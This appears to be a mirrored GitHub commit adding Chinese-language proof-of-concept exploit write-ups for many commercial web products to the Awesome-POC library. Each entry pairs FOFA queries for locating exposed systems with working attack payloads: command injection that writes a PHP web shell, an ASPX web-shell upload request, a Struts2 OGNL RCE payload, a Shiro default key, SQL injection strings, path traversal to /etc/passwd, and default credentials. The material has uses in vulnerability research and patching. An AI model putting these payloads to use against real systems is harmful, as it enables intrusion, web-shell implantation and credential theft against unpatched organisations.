mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞库:Web应用漏洞/
This commit is contained in:
parent
1a421fad6b
commit
e29999ff39
63
Web应用漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md
Normal file
63
Web应用漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md
Normal file
@ -0,0 +1,63 @@
|
||||
# 中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
中远麒麟 iAudit堡垒机 get_luser_by_sshport.php文件存在命令拼接,攻击者通过漏洞可获取服务器权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
中远麒麟 iAudit堡垒机
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
cert.subject="Baolei"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面如下
|
||||
|
||||

|
||||
|
||||
出现漏洞的文件为 get_luser_by_sshport.php
|
||||
|
||||
```
|
||||
<?php
|
||||
define('CAN_RUN', 1);
|
||||
require_once('include/global.func.php');
|
||||
require_once('include/db_connect.inc.php');
|
||||
if(empty($_GET['clientip'])){
|
||||
echo 'no host';
|
||||
return;
|
||||
}
|
||||
if(empty($_GET['clientport'])){
|
||||
echo 'no port';
|
||||
return;
|
||||
}
|
||||
$cmd = 'sudo perl test.pl '.$_GET['clientip'].' '.$_GET['clientport'];
|
||||
exec($cmd, $o, $r);
|
||||
$sql = "SELECT luser FROM sessions WHERE addr='".$_GET['clientip']."' and pid='".$o[0]."' order by sid desc limit 1";
|
||||
$rs = mysql_query($sql);
|
||||
$row = mysql_fetch_array($rs);
|
||||
echo $row['luser'];
|
||||
?>
|
||||
```
|
||||
|
||||
其中 clientip存在命令拼接 使用 ; 分割命令就可以执行任意命令
|
||||
|
||||
Web目录默认为 `/opt/freesvr/web/htdocs/freesvr/audit/`
|
||||
|
||||
发送Payload
|
||||
|
||||
```
|
||||
https://xxx.xxx.xxx.xxx/get_luser_by_sshport.php?clientip=1;echo+%27%3C?php%20var_dump(shell_exec($_GET[cmd]));?%3E%27%3E/opt/freesvr/web/htdocs/freesvr/audit/test.php;&clientport=1
|
||||
```
|
||||
|
||||

|
||||
|
||||
再访问写入的文件执行命令
|
||||
|
||||

|
||||
32
Web应用漏洞/云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md
Normal file
32
Web应用漏洞/云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md
Normal file
@ -0,0 +1,32 @@
|
||||
# 云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
云时空 社会化商业ERP为 Shiro框架 ,使用了默认的密钥导致了远程命令执行漏洞
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
云时空 社会化商业ERP系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="云时空社会化商业ERP"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
默认密钥为
|
||||
|
||||
```
|
||||
kPH+bIxk5D2deZiIxcaaaA==
|
||||
```
|
||||
|
||||

|
||||
|
||||
31
Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md
Normal file
31
Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
云时空 社会化商业ERP系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="云时空社会化商业ERP"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
使用SQLmap验证漏洞
|
||||
|
||||
```
|
||||
sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"
|
||||
```
|
||||
|
||||

|
||||
33
Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md
Normal file
33
Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md
Normal file
@ -0,0 +1,33 @@
|
||||
# 众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
众望网络 微议管理系统 后台updatefile.html页面任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
众望网络 微议管理系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"微议管理系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
默认口令 amdin/admin, 服务器更新界面上传PHP文件
|
||||
|
||||

|
||||
|
||||
访问页面
|
||||
|
||||
```
|
||||
/Updatefiles/文件名.php
|
||||
```
|
||||
@ -0,0 +1,57 @@
|
||||
# 信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 对应的ping功能存在后台命令执行漏洞,通过默认口令可以获取系统权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
信诺瑞得 WiseGrid慧敏应用交付网关
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="WiseGrid慧敏应用交付网关"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
默认口令
|
||||
|
||||
```
|
||||
ssh:root/sinogrid
|
||||
web: admin/sinogrid
|
||||
```
|
||||
|
||||
```
|
||||
POST /bin/sysadmin_action.php?action=getinfo&operation=ping&destination_value=`id`&ping_count=3&sar_value=3&netstat_value=tcp&interface= HTTP/1.1
|
||||
Host:
|
||||
Cookie: PHPSESSID=4510o12llugti8k4f24971rdf2; funcs=NNN; appversion=WiseGrid-V4.2.2R_17322; hbstate=alone; username=admin; passwordmd5=ef9ffdf6c1e2fe91d4e14b30323fb771; role=superadmin; authmode=LOCAL; session_time=1639643323; lang=zh; declaration=1; needSyn=false
|
||||
Content-Length: 0
|
||||
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
|
||||
Accept: */*
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Sec-Ch-Ua-Mobile: ?0
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
|
||||
Sec-Ch-Ua-Platform: "macOS"
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
X-Originating-Ip: 127.0.0.1
|
||||
X-Remote-Ip: 127.0.0.1
|
||||
X-Remote-Addr: 127.0.0.1
|
||||
Connection: close
|
||||
```
|
||||
|
||||

|
||||
|
||||
![]()
|
||||
29
Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md
Normal file
29
Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md
Normal file
@ -0,0 +1,29 @@
|
||||
# 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
杭州吉拉科技有限公司多个系统存在目录遍历漏洞,由于 /Business/ 访问控制不严,攻击者可利用该漏洞获取敏感信息。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
吉拉科技 LVS精益价值管理系统
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"Supperd By 吉拉科技"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/Business/
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md
Normal file
31
Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
昆石网络 VOS3000虚拟运营支撑系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="VOS-VOS3000"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md
Normal file
31
Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
汇文v5.6
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="汇文软件-书目检索系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
主页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/include/config.properties
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md
Normal file
31
Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 深信服 应用交付报表系统 download.php 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
深信服 应用交付报表系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="SANGFOR-应用交付报表系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/report/download.php?pdf=../../../../../etc/passwd
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md
Normal file
31
Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
深信服 应用交付管理系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="SANGFOR-应用交付管理系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/tmp/updateme/sinfor/ad/sys/sys_user.conf
|
||||
```
|
||||
|
||||

|
||||
37
Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md
Normal file
37
Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md
Normal file
@ -0,0 +1,37 @@
|
||||
# 畅捷CRM get_usedspace.php SQL注入漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
畅捷CRM
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="畅捷CRM"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--
|
||||
```
|
||||
|
||||

|
||||
|
||||
使用Sqlmap验证漏洞
|
||||
|
||||
```
|
||||
sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id
|
||||
```
|
||||
31
Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md
Normal file
31
Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 科达 MTS转码服务器 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
MTS转码服务器
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="MTS转码服务器"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/../../../../../../../../etc/passwd
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md
Normal file
31
Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 科达 网络键盘控制台 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
KEDACOM 网络键盘控制台存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
KEDACOM 网络键盘控制台
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"网络键盘控制台"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/../../../../../../../../etc/passwd
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md
Normal file
31
Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
紫光电子档案管理系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="紫光档案管理系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
|
||||
```
|
||||
|
||||

|
||||
39
Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md
Normal file
39
Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md
Normal file
@ -0,0 +1,39 @@
|
||||
# 绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
绿盟 BAS日志数据安全性分析系统存在未授权访问漏洞,通过漏洞可以添加任意账户登录平台获取敏感信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
绿盟 BAS日志数据安全性分析系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
body="WebApi/encrypt/js-sha1/build/sha1.min.js"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
未授权页面
|
||||
|
||||
```
|
||||
/accountmanage/index
|
||||
```
|
||||
|
||||

|
||||
|
||||
添加用户并登录
|
||||
|
||||

|
||||
|
||||
使用账户登录后台
|
||||
|
||||

|
||||
46
Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md
Normal file
46
Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md
Normal file
@ -0,0 +1,46 @@
|
||||
# 绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
绿盟 UTS综合威胁探针 某个接口未做授权导致未授权漏洞
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
绿盟 UTS综合威胁探针
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="NSFOCUS-UTS综合威胁探针"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
默认口令
|
||||
|
||||
```
|
||||
admin/Nsfocus@123
|
||||
auditor/auditor
|
||||
```
|
||||
|
||||
登陆页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/webapi/v1/system/accountmanage/account
|
||||
```
|
||||
|
||||

|
||||
|
||||
这里出现了登录的账号以及加密的 PASS
|
||||
|
||||
登陆时的加密字段抓包修改为获取的就可以登陆系统
|
||||
|
||||

|
||||
|
||||

|
||||
67
Web应用漏洞/金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md
Normal file
67
Web应用漏洞/金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md
Normal file
@ -0,0 +1,67 @@
|
||||
# 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
金山 V8 终端安全系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="在线安装-V8+终端安全系统Web控制台"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
存在漏洞的文件`/Console/receive_file/get_file_content.php`
|
||||
|
||||
```
|
||||
<?php
|
||||
if(stripos($_POST['filepath'],"..") !== false) {
|
||||
echo 'no file founggd';
|
||||
exit();
|
||||
}
|
||||
ini_set("open_basedir", "../");
|
||||
$file_path = '../'.iconv("utf-8","gb2312",$_POST['filepath']);
|
||||
if(!file_exists($file_path)){
|
||||
echo 'no file founggd';
|
||||
exit();
|
||||
}
|
||||
|
||||
$fp=fopen($file_path,"r");
|
||||
$file_size=filesize($file_path);
|
||||
|
||||
$buffer=5024;
|
||||
$file_count=0;
|
||||
|
||||
while(!feof($fp) && $file_count<$file_size){
|
||||
$file_con=fread($fp,$buffer);
|
||||
$file_count+=$buffer;
|
||||
echo $file_con;
|
||||
}
|
||||
fclose($fp);
|
||||
?>
|
||||
```
|
||||
|
||||
|
||||
|
||||
文件中没有任何的过滤 通过 filepaht 参数即可下载任意文件
|
||||
|
||||
由于不能出现 `..` ,所以只能读取web目录下的文件
|
||||
|
||||
```
|
||||
POST /receive_file/get_file_content.php
|
||||
|
||||
filepath=login.php
|
||||
```
|
||||
|
||||

|
||||
35
Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md
Normal file
35
Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md
Normal file
@ -0,0 +1,35 @@
|
||||
# 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
金笛 短信中间件Web版后台存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件信息
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
金笛 短信中间件Web版
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="金笛短信中间件(WEB版)"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
存在漏洞的位置为 日志下载
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/log?action=view&pageIndex=1&name=../../../windows/win.ini
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md
Normal file
31
Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
银达汇智 智慧综合管理平台
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"汇智信息" && title="智慧综合管理平台登入"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config
|
||||
```
|
||||
|
||||

|
||||
58
Web应用漏洞/银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞
Normal file
58
Web应用漏洞/银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞
Normal file
@ -0,0 +1,58 @@
|
||||
# 银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
银达汇智 智慧综合管理平台
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
"汇智信息" && title=="智慧综合管理平台登入"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||

|
||||
|
||||
文件上传请求包
|
||||
|
||||
```
|
||||
POST /Module/FileUpPage/FileUp.aspx?orgid=1&type=NNewsContent HTTP/1.1
|
||||
Host:
|
||||
Accept-Encoding: identity
|
||||
Content-Length: 337
|
||||
Accept-Language: zh-CN,zh;q=0.8
|
||||
Accept: */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
|
||||
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
|
||||
Connection: keep-alive
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9
|
||||
|
||||
--62907949903a4c499178971c9dab4ad9
|
||||
Content-Disposition: form-data; name="Filedata"; filename="abc.aspx"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<%@ Page Language="Jscript"%><%Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("abc", "MD5").ToLower());eval(Request.Item["cmd"],"unsafe");%>
|
||||
--62907949903a4c499178971c9dab4ad9--
|
||||
```
|
||||
|
||||

|
||||
|
||||
响应包会返回文件名,上传的目录为
|
||||
|
||||
```
|
||||
/imgnews/imgcontent/1/xxxxxxxxxx.aspx
|
||||
```
|
||||
|
||||

|
||||
|
||||
出现如图成功上传木马,密码为 `cmd`
|
||||
51
Web应用漏洞/零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md
Normal file
51
Web应用漏洞/零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md
Normal file
@ -0,0 +1,51 @@
|
||||
# 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
零视技术(上海)有限公司是以领先的视频技术服务于客户,致力于物联网视频开发简单化,依托于HTML5 WebRTC 等新的技术,实现全平台视频播放简单化。 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口,执行未授权操作。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
零视科技 H5S视频平台
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="H5S视频平台|WEB"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
API文档可以未授权访问
|
||||
|
||||
```
|
||||
/doc/api.html
|
||||
```
|
||||
|
||||

|
||||
|
||||
存在用户账号密码泄漏的接口
|
||||
|
||||
```
|
||||
/api/v1/GetUserInfo?user=admin&session=
|
||||
```
|
||||
|
||||

|
||||
|
||||
其中登录接口中 Password为接口中存在的账号密码,可以直接发送请求获取Cookie
|
||||
|
||||
```
|
||||
/api/v1/Login?user=admin&password=827ccb0eea8a706c4c34a16891f84e7b
|
||||
```
|
||||
|
||||

|
||||
|
||||
请求成功后访问主页面
|
||||
|
||||

|
||||
44
Web应用漏洞/飞视美 视频会议系统 Struts2 远程命令执行漏洞.md
Normal file
44
Web应用漏洞/飞视美 视频会议系统 Struts2 远程命令执行漏洞.md
Normal file
@ -0,0 +1,44 @@
|
||||
# 飞视美 视频会议系统 Struts2 远程命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
飞视美 视频会议系统 Struts2组件存在远程命令执行漏洞,通过漏洞攻击者可执行任意命令获取服务器权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
飞视美 视频会议系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="飞视美-视频会议系统"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
存在漏洞的路径为
|
||||
|
||||
```
|
||||
/confinfoaction!showallConfinfos.action
|
||||
```
|
||||
|
||||
发送请求包
|
||||
|
||||
```
|
||||
POST /confinfoaction!showallConfinfos.action HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 669
|
||||
Host:
|
||||
Connection: Keep-Alive
|
||||
|
||||
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ipconfig\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
|
||||
```
|
||||
|
||||

|
||||
31
Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md
Normal file
31
Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# 魅课 OM视频会议系统 proxy.php 文件包含漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
魅课OM视频会议系统 proxy.php文件target参数存在本地文件包含漏洞。攻击者可借助该漏洞无需登录便可下载任意文件。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
魅课OM视频会议系统
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="OMEETING-OM视频会议"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user